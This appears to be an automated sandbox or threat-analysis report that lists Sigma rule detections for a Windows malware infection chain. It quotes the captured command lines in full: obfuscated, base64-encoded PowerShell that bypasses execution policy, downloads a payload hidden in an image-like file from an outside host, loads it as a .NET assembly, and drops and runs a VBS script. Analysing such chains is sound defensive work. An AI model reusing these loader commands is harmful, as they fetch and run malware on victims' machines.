YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdl

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , ProcessId: 1136, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", CommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe, CommandLine|base64offset|contains: E, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe, ProcessId: 5052, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , ProcessId: 1136, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhv